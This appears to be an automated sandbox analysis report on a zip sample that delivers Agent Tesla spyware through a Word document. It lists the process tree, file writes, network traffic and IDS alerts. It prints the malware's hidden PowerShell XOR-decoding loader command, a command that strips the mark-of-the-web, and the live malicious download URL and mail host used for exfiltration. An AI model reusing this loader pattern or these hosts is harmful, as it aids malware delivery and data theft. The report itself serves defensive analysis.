File name: | Sample1.zip |
Full analysis: | https://app.any.run/tasks/a549cf45-5e21-4305-a3a6-5f9532d07375 |
Verdict: | Malicious activity |
Threats: | Agent Tesla is spyware that collects information about the actions of its victims by recording keystrokes and user interactions. It is falsely marketed as a legitimate software on the dedicated website where this malware is sold. |
Analysis date: | August 13, 2019, 15:27:51 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
Indicators: | |
MIME: | application/zip |
File info: | Zip archive data, at least v2.0 to extract |
MD5: | 68C412B442347675E074F1F99FEA14BB |
SHA1: | 57C43BB8140ED2802815E98822843563F456EC78 |
SHA256: | 71B59F2CAF632375CB44B0A8765D9AA094629254C0564FB316BFA2660282B137 |
SSDEEP: | 768:pVF1caFXHHfZWTcEFTZ5gQ7TbGoLkMFnk:DcSHhB8Z5gcb1wMFk |
.zip | ZIP compressed archive (100) |
---|---|
ZipFileName: | b64867b16525cbe3dab4f81ddf2134bdfc2e7de62b1600cf7819ed88dc859eb0.bin |
ZipUncompressedSize: | 39182 |
ZipCompressedSize: | 36225 |
ZipCRC: | 0x322c05c7 |
ZipModifyDate: | 2019:08:13 15:25:26 |
ZipCompression: | Deflated |
ZipBitFlag: | 0x0001 |
ZipRequiredVersion: | 788 |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
2900 | "C:\Program Files\WinRAR\WinRAR.exe" "C:\Users\admin\AppData\Local\Temp\Sample1.zip" | C:\Program Files\WinRAR\WinRAR.exe | — | explorer.exe |
| | User: admin; Company: Alexander Roshal; Integrity Level: MEDIUM; Description: WinRAR archiver; Exit code: 0; Version: 5.60.0 | | | |
3164 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\Desktop\ayy.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft Word; Version: 14.0.6024.1000 | | | |
492 | powershell -WindowStyle Hidden function md293 { param($fc9bf9) $d7b938 = 's3a8d65';$a8bf975 = ''; for ($i = 0; $i -lt $fc9bf9.length; $i+=2) { $c13d2b = [convert]::ToByte($fc9bf9.Substring($i, 2), 16); $a8bf975 += [char]($c13d2b -bxor $d7b938[($i / 2) % $d7b938.length]); } return $a8bf975; } $r3edcbb = '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'; $r3edcbb2 = md293($r3edcbb); Add-Type -TypeDefinition $r3edcbb2; [d24cc]::ka3d2(); | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | — | WmiPrvSE.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows PowerShell; Exit code: 0; Version: 6.1.7600.16385 (win7_rtm.090713-1255) | | | |
2648 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\admin\AppData\Local\Temp\df5laeek.cmdline" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | — | powershell.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Visual C# Command Line Compiler; Exit code: 0; Version: 8.0.50727.4927 (NetFXspW7.050727-4900) | | | |
4080 | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\admin\AppData\Local\Temp\RES746A.tmp" "c:\Users\admin\AppData\Local\Temp\CSC7459.tmp" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | — | csc.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Microsoft® Resource File To COFF Object Conversion Utility; Exit code: 0; Version: 8.00.50727.4940 (Win7SP1.050727-5400) | | | |
3672 | "C:\Users\admin\AppData\Roaming\yb264b.exe" | C:\Users\admin\AppData\Roaming\yb264b.exe | — | powershell.exe |
| | User: admin; Company: inigujesekaquguxol; Integrity Level: MEDIUM; Description: apigomir; Exit code: 0; Version: 7.11.14.18 | | | |
3192 | "C:\Windows\System32\cmd.exe" /C type nul > "C:\Users\admin\AppData\Roaming\yb264b.exe:Zone.Identifier" | C:\Windows\System32\cmd.exe | — | yb264b.exe |
| | User: admin; Company: Microsoft Corporation; Integrity Level: MEDIUM; Description: Windows Command Processor; Exit code: 0; Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | | | |
2324 | "C:\Program Files\Opera\opera.exe" | C:\Program Files\Opera\opera.exe | — | explorer.exe |
| | User: admin; Company: Opera Software; Integrity Level: MEDIUM; Description: Opera Internet Browser; Version: 1748 | | | |
3788 | C:\Users\admin\AppData\Roaming\yb264b.exe | C:\Users\admin\AppData\Roaming\yb264b.exe | — | yb264b.exe |
| | User: admin; Company: inigujesekaquguxol; Integrity Level: MEDIUM; Description: apigomir; Version: 7.11.14.18 | | | |
PID | Process | Filename | Type | MD5 | SHA256 |
---|---|---|---|---|---|
2900 | WinRAR.exe | C:\Users\admin\AppData\Local\Temp\Rar$DRb2900.11024\b64867b16525cbe3dab4f81ddf2134bdfc2e7de62b1600cf7819ed88dc859eb0.bin | — | — | — |
3164 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVR65D2.tmp.cvr | — | — | — |
492 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\S5NB67R8KW0KEEWGW118.temp | — | — | — |
2648 | csc.exe | C:\Users\admin\AppData\Local\Temp\CSC7459.tmp | — | — | — |
2648 | csc.exe | C:\Users\admin\AppData\Local\Temp\df5laeek.pdb | — | — | — |
4080 | cvtres.exe | C:\Users\admin\AppData\Local\Temp\RES746A.tmp | — | — | — |
2648 | csc.exe | C:\Users\admin\AppData\Local\Temp\df5laeek.dll | — | — | — |
2648 | csc.exe | C:\Users\admin\AppData\Local\Temp\df5laeek.out | — | — | — |
2324 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\oprCE0.tmp | — | — | — |
2324 | opera.exe | C:\Users\admin\AppData\Roaming\Opera\Opera\oprD20.tmp | — | — | — |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
2324 | opera.exe | GET | — | 162.144.12.172:80 | http://dk-rc.com/ | US | — | — | malicious |
2324 | opera.exe | GET | 200 | 162.144.12.172:80 | http://dk-rc.com/js/ | US | html | 1.26 Kb | malicious |
492 | powershell.exe | GET | 200 | 162.144.12.172:80 | http://dk-rc.com/js/Cool-Tue.exe | US | executable | 674 Kb | malicious |
2324 | opera.exe | GET | 200 | 93.184.220.29:80 | http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl | US | der | 528 b | whitelisted |
2324 | opera.exe | GET | 200 | 162.144.12.172:80 | http://dk-rc.com/favicon.ico | US | html | 1.21 Kb | malicious |
2324 | opera.exe | GET | 400 | 185.26.182.111:80 | http://sitecheck2.opera.com/?host=dk-rc.com&hdn=a9uiBCn4kkak4gCnM6qj0g== | unknown | html | 150 b | whitelisted |
3788 | yb264b.exe | GET | 200 | 18.204.189.102:80 | http://checkip.amazonaws.com/ | US | text | 12 b | shared |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
492 | powershell.exe | 162.144.12.172:80 | dk-rc.com | Unified Layer | US | suspicious |
2324 | opera.exe | 185.26.182.111:80 | sitecheck2.opera.com | Opera Software AS | — | whitelisted |
2324 | opera.exe | 93.184.220.29:80 | crl4.digicert.com | MCI Communications Services, Inc. d/b/a Verizon Business | US | whitelisted |
3788 | yb264b.exe | 18.204.189.102:80 | checkip.amazonaws.com | — | US | shared |
2324 | opera.exe | 185.26.182.93:443 | certs.opera.com | Opera Software AS | — | whitelisted |
3788 | yb264b.exe | 64.37.54.190:587 | mail.middleeast-ins.com | HostDime.com, Inc. | US | unknown |
2324 | opera.exe | 162.144.12.172:80 | dk-rc.com | Unified Layer | US | suspicious |
Domain | IP | Reputation |
---|---|---|
dk-rc.com | | malicious |
certs.opera.com | | whitelisted |
crl4.digicert.com | | whitelisted |
sitecheck2.opera.com | | whitelisted |
checkip.amazonaws.com | | shared |
mail.middleeast-ins.com | | unknown |
PID | Process | Class | Message |
---|---|---|---|
492 | powershell.exe | Potential Corporate Privacy Violation | ET POLICY PE EXE or DLL Windows file download HTTP |
492 | powershell.exe | Potentially Bad Traffic | ET INFO Executable Retrieved With Minimal HTTP Headers - Potential Second Stage Download |
3788 | yb264b.exe | A Network Trojan was detected | MALWARE [PTsecurity] AgentTesla IP Check |
3788 | yb264b.exe | Generic Protocol Command Decode | SURICATA Applayer Detect protocol only one direction |
Process | Message |
---|---|
csc.exe | *** HR originated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR propagated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |
csc.exe | *** HR originated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\copyout.cpp, line 1302 |
csc.exe | *** HR propagated: -2147024774 |
| | *** Source File: d:\iso_whid\x86fre\base\isolation\com\enumidentityattribute.cpp, line 144 |